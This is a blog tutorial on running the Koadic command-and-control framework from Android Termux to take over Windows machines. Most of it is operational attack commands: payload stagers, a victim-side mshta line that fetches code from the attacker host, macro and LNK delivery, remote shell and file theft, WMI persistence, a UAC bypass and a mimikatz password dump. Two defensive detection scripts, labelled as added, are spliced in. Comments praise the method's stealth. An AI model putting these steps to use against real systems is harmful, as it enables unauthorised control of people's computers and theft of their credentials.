Control Any Windows Using Nethunter Termux | Koadic

August 5, 2023 18 min read Sandeep Tech Team

Koadic in Action

Watch this demonstration of Koadic C2 Framework running in Termux. The video shows the complete process from installation to controlling Windows systems. This visual guide will help you understand how to transform your Android device into a powerful Windows control center.

In the world of ethical hacking and penetration testing, having the right tools at your fingertips is crucial. With the combination of Nethunter, Termux, and Koadic, you can transform your Android device into a powerful Windows control center. This comprehensive guide will walk you through the entire process of setting up and using Koadic to control Windows machines directly from your Android device.

JS Based | No Root Required | Lightweight | Full Control

What is Koadic?

Koadic is a command-and-control (C2) tool similar to Metasploit's Meterpreter, but with a focus on being lightweight and JavaScript-based. It's designed to help penetration testers establish control over target systems through various attack vectors. Koadic stands for "COM Command & Control" and leverages Windows Script Host (WSH) to execute payloads, making it particularly effective against Windows systems.

Educational Purpose Only

Koadic should only be used for educational purposes and authorized security testing. Unauthorized use of penetration testing tools is illegal and unethical. Always obtain proper permission before conducting any security tests.

Why Use Koadic with Termux and Nethunter?

Combining Koadic with Termux and Nethunter offers several advantages:

Installation Guide

Installing Koadic in Termux requires several steps due to its dependencies. Follow this guide carefully:

Setting Up Termux

First, ensure you have Termux installed on your Android device. You can download it from F-Droid.

# Update and upgrade Termux packages
pkg update && pkg upgrade -y
# Install required packages
pkg install wget curl git python python2 -y
# Install additional dependencies
pkg install openssl libffi libgmp libpcap readline sqlite -y

Installing Koadic

Now, let's install Koadic:

# Clone the Koadic repository
git clone https://github.com/zerosum0x/koadic.git
# Navigate to the Koadic directory
cd koadic
# Install Koadic requirements
pip install -r requirements.txt
# Make Koadic executable
chmod +x koadic

Setting Up Nethunter (Optional)

If you want to use Nethunter for additional tools and wireless attacks:

# Install Nethunter Store
wget -O install-nethunter-termux https://offs.ec/2MceZWr
chmod +x install-nethunter-termux
./install-nethunter-termux
# Update Nethunter packages
apt update && apt upgrade -y

Getting Started with Koadic

Now that Koadic is installed, let's start it and explore its interface:

# Start Koadic
./koadic

When you first start Koadic, you'll see a welcome screen and the Koadic prompt:

koadic
$ ./koadic
 ___________
|  |   |   |
|  |   |   |

.-'   |   |   |
'      |   |   |
|      |   |   |
|      |   |   |
|      |   |   |
'------'   '---'

Koadic C2 Framework v9.0.0

koadic (staged) >

The Koadic prompt is where you'll enter all commands. Let's explore some basic commands to get familiar with the interface.

Basic Usage and Commands

Here are some essential commands to get started with Koadic:

Help and Information

# Show help menu
koadic (staged) > help
# Show all commands
koadic (staged) > ?
# Show information about a specific command
koadic (staged) > ? use

Managing Modules

# List all available modules
koadic (staged) > ls
# Use a specific module
koadic (staged) > use stager/js/dll
# Show information about the current module
koadic (staged) > info
# Show options for the current module
koadic (staged) > info

Understanding Modules

Koadic is modular, with each module serving a specific purpose. The main types of modules are:

Module Organization

Koadic modules are organized by category and function. The naming convention follows the pattern: category/type/name. For example, stager/js/dll is a stager module that uses JavaScript to create a DLL payload.

Working with Payloads

Koadic offers several types of payloads, primarily JavaScript-based:

Types of Payloads

Generating Payloads

# Use a specific stager module
koadic (staged) > use stager/js/dll
# Set the required options
koadic (staged: stager/js/dll) > set SRVHOST 192.168.1.100
koadic (staged: stager/js/dll) > set SRVPORT 8080
# Generate the payload
koadic (staged: stager/js/dll) > run

Exploitation Techniques

Koadic supports various exploitation techniques to deliver payloads to Windows systems:

1. Web Delivery

# Use the web delivery stager
koadic (staged) > use stager/js/mshta
# Set the listening host and port
koadic (staged: stager/js/mshta) > set SRVHOST 192.168.1.100
koadic (staged: stager/js/mshta) > set SRVPORT 8080
# Run the stager
koadic (staged: stager/js/mshta) > run
# The victim can execute the payload with:
mshta http://192.168.1.100:8080/abc

2. Macro-Based Delivery

# Use the macro stager
koadic (staged) > use stager/js/office_macro
# Set the required options
koadic (staged: stager/js/office_macro) > set SRVHOST 192.168.1.100
koadic (staged: stager/js/office_macro) > set SRVPORT 8080
# Generate the macro
koadic (staged: stager/js/office_macro) > run

3. LNK File Delivery

# Use the LNK stager
koadic (staged) > use stager/js/lnk
# Set the required options
koadic (staged: stager/js/lnk) > set SRVHOST 192.168.1.100
koadic (staged: stager/js/lnk) > set SRVPORT 8080
# Generate the LNK file
koadic (staged: stager/js/lnk) > run
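
On the defending side, the mshta web delivery and macro delivery described above leave a recognizable process-creation trail. The following is an added example, not part of the original post or of Koadic: it scans constructed, simplified Sysmon Event ID 1 style records for mshta.exe launched with a remote URL and for Windows Script Host binaries spawned by an Office application. The record layout, rule names and function names are assumptions made for this example.

```python
import re
from urllib.parse import urlparse

# Constructed sample records (simplified process-creation fields, CommandLine last).
SAMPLE_LOG = r"""
Image=C:\Windows\System32\mshta.exe|ParentImage=C:\Windows\explorer.exe|CommandLine=mshta http://192.168.1.100:8080/abc
Image=C:\Windows\System32\mshta.exe|ParentImage=C:\Windows\explorer.exe|CommandLine=mshta.exe C:\Apps\inventory\start.hta
Image=C:\Windows\System32\wscript.exe|ParentImage=C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|CommandLine=wscript.exe C:\Users\a\AppData\Local\Temp\x.js
Image=C:\Windows\System32\notepad.exe|ParentImage=C:\Windows\explorer.exe|CommandLine=notepad.exe notes.txt
"""

SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}  # WSH-related hosts
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_line(line):
    """Split into three fields; maxsplit keeps any '|' inside the command line."""
    return dict(part.split("=", 1) for part in line.split("|", 2))


def classify(event):
    """Return the list of rule hits for one process-creation record."""
    image, parent = basename(event["Image"]), basename(event["ParentImage"])
    hits = []
    urls = URL_RE.findall(event["CommandLine"])
    if image == "mshta.exe" and urls:
        # mshta fetching an HTA/script over HTTP(S): record the remote endpoint.
        hits.append(f"mshta-remote-url:{urlparse(urls[0]).netloc}")
    if image in SCRIPT_HOSTS and parent in OFFICE_APPS:
        # A document application starting a script host is rarely legitimate.
        hits.append(f"office-spawned-script-host:{parent}->{image}")
    return hits


def scan(log_text):
    """Return (command line, hits) for every record that matched a rule."""
    results = []
    for line in log_text.strip().splitlines():
        event = parse_line(line)
        hits = classify(event)
        if hits:
            results.append((event["CommandLine"], hits))
    return results
```

The local .hta launch in the sample is deliberately not flagged, which shows why the rule keys on the URL argument rather than on mshta.exe alone.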

Post-Exploitation

Once you have established a session with a target system, you can perform various post-exploitation tasks:

Managing Sessions

# List all active sessions
koadic (staged) > sessions
# Interact with a specific session
koadic (staged) > sessions 1
# Background the current session
koadic (zombie 1) > bg
# Kill a session
koadic (staged) > kill 1

Post-Exploitation Commands

# Get system information
koadic (zombie 1) > sysinfo
# Get current user
koadic (zombie 1) > whoami
# List processes
koadic (zombie 1) > ps
# List files in current directory
koadic (zombie 1) > ls
# Change directory
koadic (zombie 1) > cd C:\
# Download a file from the target
koadic (zombie 1) > download C:\important_file.txt
# Upload a file to the target
koadic (zombie 1) > upload /sdcard/file.txt C:\
# Execute a command on the target
koadic (zombie 1) > shell whoami
# Get a shell on the target
koadic (zombie 1) > shell

Advanced Features

Koadic offers several advanced features for more sophisticated penetration testing:

Persistence

# Use the persistence module
koadic (staged) > use implant/persistence/wmi_event_subscription
# Set the target zombie
koadic (staged: implant/persistence/wmi_event_subscription) > set ZOMBIE 1
# Run the persistence module
koadic (staged: implant/persistence/wmi_event_subscription) > run

Privilege Escalation

# Use the privilege escalation module
koadic (staged) > use privesc/bypassuac_eventvwr
# Set the target zombie
koadic (staged: privesc/bypassuac_eventvwr) > set ZOMBIE 1
# Run the privilege escalation module
koadic (staged: privesc/bypassuac_eventvwr) > run

Credential Harvesting

# Use the credential harvesting module
koadic (staged) > use creds/mimikatz/sam_dump
# Set the target zombie
koadic (staged: creds/mimikatz/sam_dump) > set ZOMBIE 1
# Run the credential harvesting module
koadic (staged: creds/mimikatz/sam_dump) > run
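
The WMI event subscription persistence and the eventvwr UAC bypass named above each have well-known host telemetry. The following is an added example for blue teams, not part of the original post or of Koadic: it triages constructed events in a simplified Sysmon-like shape, using Sysmon Event IDs 19, 20 and 21 (WMI filter, consumer, binding), Event ID 13 (registry value set) on the mscfile open-command key, and Event ID 1 for unexpected children of eventvwr.exe. The event dictionaries, finding names and function names are assumptions made for this example.

```python
# Constructed sample events; only the fields each rule needs are present.
SAMPLE_EVENTS = [
    {"EventID": 13,
     "TargetObject": r"HKU\S-1-5-21-1111-1001_Classes\mscfile\shell\open\command\(Default)",
     "Details": r"C:\Users\Public\constructed-example.exe"},
    {"EventID": 1, "ParentImage": r"C:\Windows\System32\eventvwr.exe",
     "Image": r"C:\Windows\System32\mshta.exe"},
    {"EventID": 1, "ParentImage": r"C:\Windows\System32\eventvwr.exe",
     "Image": r"C:\Windows\System32\mmc.exe"},          # normal child, not flagged
    {"EventID": 19}, {"EventID": 20}, {"EventID": 21},  # filter, consumer, binding
    {"EventID": 13, "TargetObject": r"HKLM\SOFTWARE\Example\Setting", "Details": "1"},
]

WMI_IDS = {19: "filter", 20: "consumer", 21: "binding"}
HIJACK_KEY = r"\mscfile\shell\open\command"  # per-user handler used by the eventvwr bypass


def leaf(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def triage(events):
    """Return (finding, detail) tuples for persistence and UAC-bypass artifacts."""
    findings, wmi_parts = [], set()
    for ev in events:
        eid = ev["EventID"]
        if eid in WMI_IDS:
            wmi_parts.add(WMI_IDS[eid])
        elif eid == 13 and HIJACK_KEY in ev["TargetObject"].lower():
            # A user-hive override of the .msc handler: report the command it points to.
            findings.append(("uac-bypass-registry-hijack", ev["Details"]))
        elif (eid == 1 and leaf(ev["ParentImage"]) == "eventvwr.exe"
              and leaf(ev["Image"]) != "mmc.exe"):
            findings.append(("eventvwr-unexpected-child", leaf(ev["Image"])))
    if wmi_parts:
        # A working subscription needs all three objects; fewer means partial evidence.
        state = "complete" if len(wmi_parts) == 3 else "partial"
        findings.append((f"wmi-subscription-{state}", ",".join(sorted(wmi_parts))))
    return findings
```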

Ethical Considerations

While Koadic is a powerful tool, it's important to use it ethically and responsibly:

Legal Warning

Unauthorized use of Koadic or any penetration testing tools is illegal in most jurisdictions. This tutorial is for educational purposes only. Always obtain proper permission before conducting any security tests.

Command Reference

Koadic Commands

| Command | Description | Example |
|---|---|---|
| ./koadic | Start the Koadic console | ./koadic |
| help | Show help menu | help |
| ls | List all available modules | ls |
| use | Select a module | use stager/js/dll |
| info | Show information about the current module | info |
| set | Set a module option | set SRVHOST 192.168.1.100 |
| run | Execute the current module | run |
| sessions | List all active sessions | sessions |
| sessions [id] | Interact with a specific session | sessions 1 |
| bg | Background the current session | bg |
| kill [id] | Kill a session | kill 1 |
| shell | Execute a shell command | shell whoami |
| download | Download a file from the target | download C:\file.txt |
| upload | Upload a file to the target | upload /sdcard/file.txt C:\ |

Koadic in Termux with Nethunter brings the power of professional penetration testing to your Android device. Whether you're a security professional, an ethical hacker, or just someone interested in learning about cybersecurity, Koadic provides a comprehensive platform for testing and securing Windows systems. Remember to always use these tools ethically and with proper authorization.

Alex Johnson
August 6, 2023
Amazing guide! I've been looking for a way to use Koadic on Android for months. The JavaScript-based approach is brilliant and much stealthier than traditional methods. Thanks for the detailed instructions!
Sarah Williams
August 7, 2023
This is exactly what I needed for my security studies. Having Koadic on my phone means I can practice Windows exploitation techniques anywhere. The section on post-exploitation was particularly helpful!